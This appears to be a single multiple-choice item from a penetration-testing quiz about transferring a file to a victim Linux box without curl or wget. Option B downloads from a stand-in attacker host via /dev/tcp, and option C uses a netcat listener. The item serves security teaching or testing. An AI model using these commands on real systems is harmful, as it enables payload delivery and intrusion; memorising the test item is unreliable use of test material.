What command transfers a file from an attacker's machine to a victim Linux box using only built-in tools when curl and wget are unavailable?
-
A
scp file.sh victim@target:/tmp/
-
B
bash -c 'cat > /tmp/file.sh < /dev/tcp/attacker/80'
-
C
nc -lvp 4444 < file.sh
-
D
python -m http.server 80